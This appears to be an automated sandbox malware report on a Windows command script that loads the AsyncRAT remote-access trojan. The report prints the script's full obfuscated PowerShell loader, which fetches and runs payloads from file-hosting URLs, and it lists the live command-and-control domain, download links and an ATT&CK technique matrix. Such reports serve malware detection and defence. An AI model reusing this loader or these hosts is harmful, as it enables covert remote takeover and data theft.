cent.begal0opera ';$huaco=ugedagens ' zo,luskaloskrnerere rordema,-stormaempreg disselandsnmartetm tap ';$fluernes=ugedagens 'serv hcathatuna tt su,ephe,ges cevi:du,le/sil,n/apprewdiletwa,vaewplkke. milis la,refarmanladeddcrystsnonh.peje.ta niveccurn.ehande.maadgccicerochalomaston/anen,pv.rmtrlyzetoar,th/iodocdlinielkom.e/afskewmulti4homebeetabl2preenq udadb k.st ';$astrographer=ugedagens 'homol>fossi ';$adenoncus=ugedagens 'afmnsi exhoesv,nfxinku. ';$minussernes='olieraffinaderiets';$omskrivelses = ugedagens ' v,rde oplacpopl,hfi ucobronc svog%b.lthakiropp svamp de,adout aau,tryttorrea,push%shodd\syndebs.mshe,aksevsmileosmalngalumitunderepolemsdeam,1cervi4dispe0quadr. me,lo sv tuintegtant.s v,let&st,ll&canto for.oeomlydcstuddhfaktuoamts ordretdire. ';semuljegrynets (ugedagens 're,et$ lectg direlorthoos rapb tranasequelsmerg:stillare.idpassaypv.rdelblrerafol.euplinksneuroem tenr expls ode=ka.ao( hardcun elmphagodgasco nonre/girl,clikvi jordr$undskomaku mpantos bli k mor.rretsbi forsvcharleh,athlasylssdistieosteostante)udski ');semuljegrynets (ugedagens 'netts$ c.okgelevtlskeigomisemb elvearegovlfa,il:littof pr.moexpanr s brvcons,abesk.ykandi= subp$ hopofbjrgilintegutapp,etoothr.pegenimpe.etegnes hyst.bes as,igtipfunguls,andi u jetdok m(punkt$respea kr.dsadnottg,derrs,mmeozuluegbrom,rs.ranaefterpkonflh fhne.umphrrling) .nsl ');$fluernes=$forvay[0];$underabyss= (ugedagens 'bogka$rygergrugerludsmyooffe bacridaskftelskift:vegetf ga ees.rigepressrblodsi em ee tetr= n.nrn dybte te,swfo,ho-chaveo ymidbh terj ove.erullec kul,tudfri st.tisdiv,rytruansmelilt fabiephilom mark.por.un evocearisttmalap.quentwfupmaespectb encrc infalbese.i.itike partnspiset');$underabyss+=$applausers[1];semuljegrynets ($underabyss);semuljegrynets (ugedagens ' auto$stap fnedere prveedruggrturfsihaplyefogc.. n,tuhtaurieinexhab ndedminice ionirdharasfort [nrtb $op,inhk,nsluokk padusticdressotrukn] moll= .ott$tooticsynaeumascursl tsrc,lebynonlycmerrio eccrmqu tabunabsi,ingenresungcu,pi ');$aktualitetens=ugedagens 'gra.e$ balsfforese f.ageomulcrlanitiJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$lassoing = 1;$rasophore='sub';$rasophore+='strin';$rasophore+='g';function ugedagens($outdure){$frys=$outdure.length-$lassoing;for($interproducing=5;$interproducing -lt $frys;$interproducing+=6){$unlecherous+=$outdure.$rasophore.invoke( $interproducing, $lassoing);}$unlecherous;}function semuljegrynets($barbarized){. ($adenoncus) ($barbarized);}$currycombing=ugedagens 'chronm,jerno istnzdes ei .rdmlsanktlw llialevul/outca5averr..eman0uforl ort,g(handlwsendei precn,niffd,edeoo bor wdioxas w,gg ko,svncrosstinope overl1 indr0klamm.op.ak0mavel;instr ro ndwnonfaibeg.enflygt6totaq4lufth;bo.ti radixfylgj6 g.nn4tachy;ha ss ek.pr sy.ev lndi: iece1tilst2j ntj1pisto.antid0bavn.)plant oragkibose,odlicre,ulk,verfofli o/succu2n.ntr0pulve1hj.ej0forfa0ubeta1 ekst0 fort1fl,pp leddfrebeditorskrselvgehumatf,robyobarvexskjo /dress1,ydro2urtid1 cent.begal0opera ';$huaco=ugedagens ' zo,luskaloskrnerere rordema,-stormaempreg disselandsnmartetm tap ';$fluernes=ugedagens 'serv hcathatuna tt su,ephe,ges cevi:du,le/sil,n/apprewdiletwa,vaewplkke. milis la,refarmanladeddcrystsnonh.peje.ta niveccurn.ehande.maadgccicerochalomaston/anen,pv.rmtrlyzetoar,th/iodocdlinielkom.e/afskewmulti4homebeetabl2preenq udadb k.st ';$astrographer=ugedagens 'homol>fossi ';$adenoncus=ugedagens 'afmnsi exhoesv,nfxinku. ';$minussernes='olieraffinaderiets';$omskrivelses = ugedagens ' v,rde oplacpopl,hfi ucobronc svog%b.lthakiropp svamp de,adout aau,tryttorrea,push%shodd\syndebs.mshe,aksevsmileosmalngalumitunderepolemsdeam,1cervi4dispe0quadr. me,lo sv tuintegtant.s v,let&st,ll&canto for.oeomlydcstuddhfaktuoamts ordretdire. ';semuljegrynets (ugedagens 're,et$ lectg direlorthoos rapb tranasequelsmerg:stillare.idpassaypv.rdelblrerafol.euplinksneuroem tenr expls ode=ka.ao( hardcun elmphagodgasco nonre/girl,clikvi jordr$undskomaku mpantos bli k mor.rretsbi forsvcharleh,athlasylssdistieosteostante)udski ');semuljegrynets (ugedagens 'netts$ c.okgelevtlskeigomisemb elvearegovlfa,il:littof pr.moexpanr s brvcons,abesk.ykandi= subp$ hopofbjrgilintegutapp,etoothr.pegenimpe.etegnes hyst.bes as,igtipfunguls,andi u jetdok m(punkt$respea kr.dsadnottg,derrs,mmeozuluegbrom,rs.ranaefterpkonflh fhne.umphrrling) .nsl ');$fluernes=$forvay[0];$underabyss= (ugedagens 'bogka$rygergrugerludsmyooffe bacridaskftelskift:vegetf ga ees.rigepressrblodsi em ee tetr= n.nrn dybte te,swfo,ho-chaveo ymidbh terj ove.erullec kul,tudfri st.tisdiv,rytruansmelilt fabiephilom mark.por.un evocearisttmalap.quentwfupmaespectb encrc infalbese.i.itike partnspiset');$underabyss+=$applausers[1];semuljegrynets ($underabyss);semuljegrynets (ugedagens ' auto$stap fnedere prveedruggrturfsihaplyefogc.. n,tuhtaurieinexhab ndedminice ionirdharasfort [nrtb $op,inhk,nsluokk padusticdressotrukn] moll= .ott$tooticsynaeumascursl tsrc,lebynonlycmerrio eccrmqu tabunabsi,ingenresungcu,pi ');$aktualitetens=ugedagens 'gra.e$ balsfJump to behavior
        Source: wab.exe, 0000000A.00000003.2677388479.0000000025739000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3357559154.0000000023721000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2819015436.0000000025753000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: wab.exe, 0000000A.00000002.3357559154.0000000023721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe
        Source: wab.exe, 0000000A.00000002.3357559154.0000000023721000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3357559154.00000000236FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Yara detected AsyncRAT
        Source: Yara matchFile source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5892, type: MEMORYSTR
        Source: wab.exe, 0000000A.00000002.3359228146.00000000257A0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3343246570.0000000007CE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
        Windows Management Instrumentation        		1
        Scheduled Task/Job        		112
        Process Injection        		1
        Masquerading        		OS Credential Dumping21
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts11
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		1
        Scheduled Task/Job        		1
        Disable or Modify Tools        		LSASS Memory2
        Process Discovery        		Remote Desktop ProtocolData from Removable Media1
        Non-Standard Port        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Scheduled Task/Job        		Logon Script (Windows)1
        DLL Side-Loading        		31
        Virtualization/Sandbox Evasion        		Security Account Manager31
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive1
        Ingress Tool Transfer        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        PowerShell        		Login HookLogin Hook112
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Obfuscated Files or Information        		LSA Secrets1
        File and Directory Discovery        		SSHKeylogging213
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Software Packing        		Cached Domain Credentials14
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446776 Sample: xff.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 30 dhhj.duckdns.org 2->30 32 www.sendspace.com 2->32 34 2 other IPs or domains 2->34 48 Snort IDS alert for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 56 6 other signatures 2->56 9 cmd.exe 1 2->9         started        signatures3 54 Uses dynamic DNS services 30->54 process4 signatures5 58 Suspicious powershell command line found 9->58 60 Very long command line found 9->60 12 powershell.exe 14 23 9->12         started        16 conhost.exe 9->16         started        process6 dnsIp7 40 fs13n2.sendspace.com 69.31.136.57, 443, 49700 GTT-BACKBONEGTTDE United States 12->40 42 www.sendspace.com 104.21.28.80, 443, 49699, 49708 CLOUDFLARENETUS United States 12->42 62 Suspicious powershell command line found 12->62 64 Very long command line found 12->64 66 Found suspicious powershell code related to unpacking or dynamic code loading 12->66 18 powershell.exe 17 12->18         started        21 conhost.exe 12->21         started        23 cmd.exe 1 12->23         started        signatures8 process9 signatures10 44 Writes to foreign memory regions 18->44 46 Found suspicious powershell code related to unpacking or dynamic code loading 18->46 25 wab.exe 14 18->25         started        28 cmd.exe 1 18->28         started        process11 dnsIp12 36 dhhj.duckdns.org 12.202.180.134, 49711, 8797 FISERV-INCUS United States 25->36 38 fs03n5.sendspace.com 69.31.136.17, 443, 49709 GTT-BACKBONEGTTDE United States 25->38

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        xff.cmd3%ReversingLabs

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://aka.ms/pscore6lB0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        http://www.sendspace.com0%Avira URL Cloudsafe
        https://www.sendspace.com0%Avira URL Cloudsafe
        https://fs13n2.sendspace.com0%Avira URL Cloudsafe
        https://github.com/Pester/Pester0%Avira URL Cloudsafe
        https://www.sendspace.com/pro/dl/w4e2qbP0%Avira URL Cloudsafe
        https://fs13n2.sendspace.com/dlpro/5990f4102977ad47c8b1158344464586/664f92e4/w4e2qb/Bystoerrelse.fla0%Avira URL Cloudsafe
        https://fs03n5.sendspace.com/0%Avira URL Cloudsafe
        https://www.sendspace.com/pro/dl/w4e2qb0%Avira URL Cloudsafe
        http://fs13n2.sendspace.com0%Avira URL Cloudsafe
        https://fs03n5.sendspace.com/dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold0%Avira URL Cloudsafe
        https://www.sendspace.com/pro/dl/w4e2qbXR0%Avira URL Cloudsafe
        https://fs03n5.sendspace.com/hf0%Avira URL Cloudsafe
        https://fs03n5.sendspace.com/om:4430%Avira URL Cloudsafe
        https://www.sendspace.com/pro/dl/6f2c5c0%Avira URL Cloudsafe
        https://fs03n5.sendspace.com/79c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin0%Avira URL Cloudsafe
        https://fs13n2.sendspaX0%Avira URL Cloudsafe
        https://www.sendspace.com/0%Avira URL Cloudsafe
        https://fs03n5.sendspace.com/dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin0%Avira URL Cloudsafe
        dhhj.duckdns.org0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        dhhj.duckdns.org
        		12.202.180.134
        		truetrue
          		unknown
          fs13n2.sendspace.com
          		69.31.136.57
          		truefalse
            		unknown
            fs03n5.sendspace.com
            		69.31.136.17
            		truefalse
              		unknown
              www.sendspace.com
              		104.21.28.80
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://fs13n2.sendspace.com/dlpro/5990f4102977ad47c8b1158344464586/664f92e4/w4e2qb/Bystoerrelse.flafalse
                • Avira URL Cloud: safe
                		unknown
                https://www.sendspace.com/pro/dl/w4e2qbfalse
                • Avira URL Cloud: safe
                		unknown
                https://fs03n5.sendspace.com/dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.binfalse
                • Avira URL Cloud: safe
                		unknown
                dhhj.duckdns.orgtrue
                • Avira URL Cloud: safe
                		unknown
                https://www.sendspace.com/pro/dl/6f2c5cfalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2910312975.0000017BCF83F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                https://fs03n5.sendspace.com/wab.exe, 0000000A.00000002.3343246570.0000000007D40000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://go.micropowershell.exe, 00000003.00000002.2793992270.0000017BC0A66000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://fs03n5.sendspace.com/dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvoldwab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2613840916.0000000007D57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3343246570.0000000007D40000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.sendspace.com/pro/dl/w4e2qbPpowershell.exe, 00000003.00000002.2793992270.0000017BBF9FD000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://fs13n2.sendspace.compowershell.exe, 00000003.00000002.2793992270.0000017BC15B1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.sendspace.compowershell.exe, 00000003.00000002.2793992270.0000017BC1579000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://fs13n2.sendspace.compowershell.exe, 00000003.00000002.2793992270.0000017BBFC63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2793992270.0000017BC159E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.sendspace.compowershell.exe, 00000003.00000002.2793992270.0000017BC1091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2793992270.0000017BBF9FD000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.sendspace.com/pro/dl/w4e2qbXRpowershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.sendspace.com/wab.exe, 0000000A.00000002.3343246570.0000000007CE8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://fs03n5.sendspace.com/hfwab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2613840916.0000000007D57000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2617612973.0000000004B71000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://fs13n2.sendspaXpowershell.exe, 00000003.00000002.2793992270.0000017BC159E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2910312975.0000017BCF83F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://fs03n5.sendspace.com/om:443wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://fs03n5.sendspace.com/79c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.binwab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore68powershell.exe, 00000003.00000002.2793992270.0000017BBF7D1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2793992270.0000017BBF7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2617612973.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                69.31.136.17
                		fs03n5.sendspace.comUnited States
                		3257GTT-BACKBONEGTTDEfalse
                12.202.180.134
                		dhhj.duckdns.orgUnited States
                		22983FISERV-INCUStrue
                104.21.28.80
                		www.sendspace.comUnited States
                		13335CLOUDFLARENETUSfalse
                69.31.136.57
                		fs13n2.sendspace.comUnited States
                		3257GTT-BACKBONEGTTDEfalse

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1446776
                Start date and time:2024-05-23 21:02:10 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 4s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:12
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
